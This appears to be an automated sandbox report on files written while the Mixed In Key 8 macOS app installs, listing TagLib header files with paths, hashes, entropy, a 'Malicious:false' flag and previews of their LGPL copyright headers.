                                                                                                    Preview: /***************************************************************************. copyright : (C) 2014 by Urs Fleisch. email : ufleisch@users.sourceforge.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_pjpdlx
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):6260
                                                                                                    Entropy (8bit):4.264176880512891
                                                                                                    Encrypted:false
                                                                                                    MD5:E89555185AF2B4D9B3214F77C82EF852
                                                                                                    SHA1:A5F9FE380C369D499C8D60151AF5DD592E56E78B
                                                                                                    SHA-256:CC28DE2682CC05FFA0227042BE2981C2E81666619BD69850381FFD5391536106
                                                                                                    SHA-512:A6A21D11C117FFCE5041B06A6CC9671F7BF69E79592A884AC730303A443710ECFA0F8EABD159AAF40C623ED2C026DBF17ED7DA3E04605AD46C33CECB8357D635
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /**************************************************************************. copyright : (C) 2010 by Luk.... Lalinsk... email : lalinsky@gmail.com. **************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_qNXSQX
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):5931
                                                                                                    Entropy (8bit):4.443131080663439
                                                                                                    Encrypted:false
                                                                                                    MD5:ECF010013511A11E41E40A1890618E4E
                                                                                                    SHA1:24D677A7DE2FABEA3FC5C44D9429978B648EBF8A
                                                                                                    SHA-256:F20C43AC6BC65FB682840827F960879F696396CC94C346217E26A7882A6B80B1
                                                                                                    SHA-512:03C836A5E28D5B059E18278D06CE149410633ACAFDCA275BA0C7CD1AF17B71CDA441BFB3885DC6C28EA4F4B199B19E94FB448F0E30E485C4A9476A3FA2EB8722
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_qYqofz
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):3159
                                                                                                    Entropy (8bit):4.380666386249091
                                                                                                    Encrypted:false
                                                                                                    MD5:1E77D001E9D2E28284642B05C7CB2282
                                                                                                    SHA1:89615A6963EE75BC9DD8931C583AC13BE2FAEC30
                                                                                                    SHA-256:0B933507E5B558E086B5D2D3BE5F6DF511E8BF0F50FF47CCC8D03035F7FE9803
                                                                                                    SHA-512:E2AA23041E4A5C463C270DDE6914A8C51E58B6E5378CE3372C29F10C77D98A19FDF16C4C239EA4171FB9763A996F37A8C2E10EB657DBF41D7BCC0B30B009B8C9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_qhj5eo
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):5858
                                                                                                    Entropy (8bit):4.316842403938969
                                                                                                    Encrypted:false
                                                                                                    MD5:25774740C4142C301425E1EC8D902232
                                                                                                    SHA1:BE5C000FBE0B66C9A077ECE0283A8065722D70D5
                                                                                                    SHA-256:CE1685D9CF5FBC4EB7F67F924CE859DB5703500EABDB246F65592A148877ECD2
                                                                                                    SHA-512:51203765870BCD2D5474DE4E5743F7E2E6BDEDA227ACE061EE67CBE585DAE0F693BCD1B043AAE2CB27BD21C13978FB3476F592388A2E6FAC5A3C20386630F55A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_qxS8DU
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):4777
                                                                                                    Entropy (8bit):4.292600596513896
                                                                                                    Encrypted:false
                                                                                                    MD5:7C8D436FAB4778D83156409DA0BC0E0D
                                                                                                    SHA1:92ACBA206D033CABB1C88A353BDBE18CB9546517
                                                                                                    SHA-256:1F37E6D61C85BB80C6DA9CD9D698046729DCDAA924F45D6964A547763334DCC0
                                                                                                    SHA-512:F06200B61AAB9DFF407E6F88C72F4999C2A26C0DEB0F3A507235994188F65609001B7F7A52CACC58E1BC30DA3C578F65946B3C50481A82EC7032821AE9B23D11
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2006 by Luk.... Lalinsk... email : lalinsky@gmail.com.. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. (original MPC implementation). ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A P
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_tgOz3l
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):4153
                                                                                                    Entropy (8bit):4.251301784971283
                                                                                                    Encrypted:false
                                                                                                    MD5:05DB2E00E04E04A3B5B3300A436AD632
                                                                                                    SHA1:C9698721136B014543ECF211361298506EE483B3
                                                                                                    SHA-256:23ADB09B17EB5AA78A80A2037A87B85C5A2E6743C61C83178BEE07B2C97241DB
                                                                                                    SHA-512:EA336073669537A42ED844D503957E1C27B011F943317D9018606110BA6FE998DA8FF830B877DAB014328A5703799174EB753F63E924E28B15022ADA47FC6CAE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2011 by Mathias Panzenb..ck. email : grosser.meister.morti@gmx.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_u8jq5A
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):5209
                                                                                                    Entropy (8bit):4.235139754832094
                                                                                                    Encrypted:false
                                                                                                    MD5:A9DBF82E10AE23607A1D45A1DDF48DE5
                                                                                                    SHA1:20C3B7269B4CBA0D77DE7DA6F2D93500C047433C
                                                                                                    SHA-256:08070440F096BB2E07F090C0CD81DD38D2E429DD09B0A5882A833E000BCE58C6
                                                                                                    SHA-512:810F5C1FB3226E4BCFB2A055563D1CCAD8F292D40B163A531B9FC52BC47594FEA154AFD354B65D42433E68F8EF0AC8E6253D9059AB85E62AB857C6866F3E9BBA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_u90YHb
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):6277
                                                                                                    Entropy (8bit):4.433224552639377
                                                                                                    Encrypted:false
                                                                                                    MD5:B1D4CD11E75EEBE0A13BFFA095E0A2A7
                                                                                                    SHA1:A199F33B7AD09183151B696364CD15C508068843
                                                                                                    SHA-256:266D1779D269F214AEF490A0D2A2542328698D1187029573FF70693C05BCA08C
                                                                                                    SHA-512:53B17CC3275F22E41DE1F9E8AED7B36D9E52347B12583FD2ACFD9F1E0715CA0A2191925F6DE17E1057503A6CB418624442D9EB972500529B8E832B7D89BE7B04
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org.. copyright : (C) 2006 by Urs Fleisch. email : ufleisch@users.sourceforge.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser Gen
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_v3DNzq
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):4573
                                                                                                    Entropy (8bit):4.346952933513883
                                                                                                    Encrypted:false
                                                                                                    MD5:8410EC7584B549275FB6D82B17D8BD62
                                                                                                    SHA1:D00B889EEFB8DFC8B986A689251FCDB03DFDD90E
                                                                                                    SHA-256:EB8C582413D9A5A1DB5E40BED603E099EBED92BFF47AF0B2440AD3258B8D92E6
                                                                                                    SHA-512:0984B33F3FE4D29470A125933487C926826019071F70E9499C7AD32528697A356DB9149D1D3687DFF16AE35DD791E7A81DF8B31C8AA4A047EAA739396BA9CB3F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /**************************************************************************. copyright : (C) 2005-2007 by Luk.... Lalinsk... email : lalinsky@gmail.com. **************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_vHlGbf
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):5028
                                                                                                    Entropy (8bit):4.275995511560157
                                                                                                    Encrypted:false
                                                                                                    MD5:D4A5560343CFF6D5D456F3330C36AEAA
                                                                                                    SHA1:A75E5F3D01B2718D490197F946FB26EF3E6B13D7
                                                                                                    SHA-256:8F0938D05DD38DADBE7580578BDE428FC57EEE57F2288C03252587BAA70CAFCD
                                                                                                    SHA-512:973D3FEE4DCA1BA69B109D308D3CFBF259021559F2EF4926FF7EED95F15037752A2723CDFFD168B8A4156D020FE9AE27E1BB7F8D5B8F1612BEC174D75B2177FA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2012 by Luk.... Lalinsk... email : lalinsky@gmail.com.. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. (original Vorbis implementation).***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A P
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_vSJ7Pt
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):5055
                                                                                                    Entropy (8bit):4.233614223585261
                                                                                                    Encrypted:false
                                                                                                    MD5:7C45E49B5DEF21379FD065061FC0FD9F
                                                                                                    SHA1:9FB54B78E8DCEF634DE8A49E017F2EF11F51EEA8
                                                                                                    SHA-256:D0B08575045D091AD8D39B68EC3652B736AE8890CA0DE0FE5CED4C51E150C177
                                                                                                    SHA-512:6892F5946630501F4C0E0F4C62A5DB7A944083651B16ED6C4FD6937678947E5163F77426996C90CD4C830ECCCB10CBE4FA652D6FC6866B4A716F57AE9695B34E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_w0zjHn
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):3841
                                                                                                    Entropy (8bit):4.30245775758812
                                                                                                    Encrypted:false
                                                                                                    MD5:7A912AC1C8A440AD9C6AAE78FD36D2A0
                                                                                                    SHA1:1FEB2D29CED2CEFCA540A7698260621BE3011DCC
                                                                                                    SHA-256:2CCC19BD942573E638BF20288943B3417FC6BE3B20B36284AD0867DD8527E87D
                                                                                                    SHA-512:8785741DC1D0E8BB9D691BF4BE0437FEC3EB551439863C7B73FCF64FD8246EC00361142D8404CE25A94BA7C74D11C5E5CE75F18F4D91830D3F6DFC1011BA6604
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2011 by Mathias Panzenb..ck. email : grosser.meister.morti@gmx.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_w73XOs
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):2846
                                                                                                    Entropy (8bit):4.26298734487071
                                                                                                    Encrypted:false
                                                                                                    MD5:944D92E76678BC7E62D8DEF41702142D
                                                                                                    SHA1:77199FD99CBDB8E7EFDB8619C2A9D1CEE47403AC
                                                                                                    SHA-256:9C1921B262F450521E22B48EFB54428DA8EF18D4E6739A4BBDCD588F6BB43FDE
                                                                                                    SHA-512:70662F01F8C968500E2606535B9753552E11062E4C9E124112F40DBEE302F22DA044AE4B5ED571956C8C6F3FDB6B8726D4C0C6219360925DBBE875F572A77883
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2015 by Urs Fleisch. email : ufleisch@users.sourceforge.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_wJptPL
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):4538
                                                                                                    Entropy (8bit):4.293781981962392
                                                                                                    Encrypted:false
                                                                                                    MD5:A8B6BFEA997501E6D40FC48850D11CDC
                                                                                                    SHA1:7B76B1BF403925C22EC4B8F478893FF833F27391
                                                                                                    SHA-256:93C96F053E0330E4EF29A2C3EB7BE8DA54A9A7D18C4F7B96D03ADBB60CE783B3
                                                                                                    SHA-512:8FAD9D29AE6BB34A3E965DE699DC168C1AE85A9666342FC695782F24E542135BD8073FA84CBBEB275F991804A84158469EE9FFB05483F470BA32AE2B5D7B7F91
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2012 by Rupert Daniel. email : rupert@cancelmonday.com. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_xlM2ZA
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):4017
                                                                                                    Entropy (8bit):4.239874887293045
                                                                                                    Encrypted:false
                                                                                                    MD5:DB57AE4BCD3914FAB87CBDFCD516F7D5
                                                                                                    SHA1:F41830D9595063F5F207505E53CB9AECE9BF7E21
                                                                                                    SHA-256:11BABDCC9AC5901FF3555B63D3CD23F98D461B4038805001913FC88347B8D824
                                                                                                    SHA-512:684CE2EF057F3CFCCC4DBC480D74FAD2842DBA00B47653E0961F25A286B38DBA87EA52AD52BA132C81D998BF754B78328816CFE71E24F8BF3398D31CD19F39B6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2011 by Mathias Panzenb..ck. email : grosser.meister.morti@gmx.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_zMt2f2
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):4456
                                                                                                    Entropy (8bit):4.258699137018649
                                                                                                    Encrypted:false
                                                                                                    MD5:5181CAC5CD48E24948226BCD70DF89B1
                                                                                                    SHA1:F4E9C66823F4812B08D6B4DC8F781213BC1F737D
                                                                                                    SHA-256:E5F2E6997C1EC4ACDA8BBBECA702CB4E6C1F0357A94A69E8FECB99BB70501F4F
                                                                                                    SHA-512:95B83F3F093947150FD61BC53DE22BD70385B54154E274417F3F72356801F0EC4831453BC801D2A6CDEF93B71344CD740DD0A464FF311155A95D2268E5CE9553
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2010 by Alex Novichkov. email : novichko@atnet.ru.. copyright : (C) 2006 by Luk.... Lalinsk... email : lalinsky@gmail.com. (original WavPack implementation). ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PAR
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_HBpmSH
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):2086
                                                                                                    Entropy (8bit):4.1256225185777495
                                                                                                    Encrypted:false
                                                                                                    MD5:BFB0B1A0E0B736889326EA84D8BC3E59
                                                                                                    SHA1:9E023DA208DA0057743351ACF7C288516E0F0296
                                                                                                    SHA-256:4893CC4187743DC151C00D2CB5DF0B15CCB80528D23177F2690EC5C1E29A488C
                                                                                                    SHA-512:782EDACDF3A4CCF2D274F6C7BC62C798F87A64EAB7F3F0860521A906E643264318A05810D745BD7B5D1CB3C3D9A24A01DB6004AD674AE50BD62C1EAACCAF9DF1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2015 by Tsuda Kageyu. email : tsuda.kageyu@gmail.com. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_V22fs3
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):2343
                                                                                                    Entropy (8bit):4.172153948952005
                                                                                                    Encrypted:false
                                                                                                    MD5:22374241BB60C8308C08F9EB3D4E31AC
                                                                                                    SHA1:62790C390E3B1B0BEBFA2C68C401BB976D323F8D
                                                                                                    SHA-256:B4E1E73D0AFD77B3E49762AE57FB00FAD2CA3208E3CF8EE2E3EC8551544E4AFF
                                                                                                    SHA-512:3A5010EB22ADB00C2DEB5720984FEE5B44C979DF45BDD2B3B3F5269DF198481545E2670F1D7115E0BAE5BDB34ABBADC0A62F3F522C16D1FFA865F1508A5190B2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2015 by Tsuda Kageyu. email : tsuda.kageyu@gmail.com. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_fqpQMe
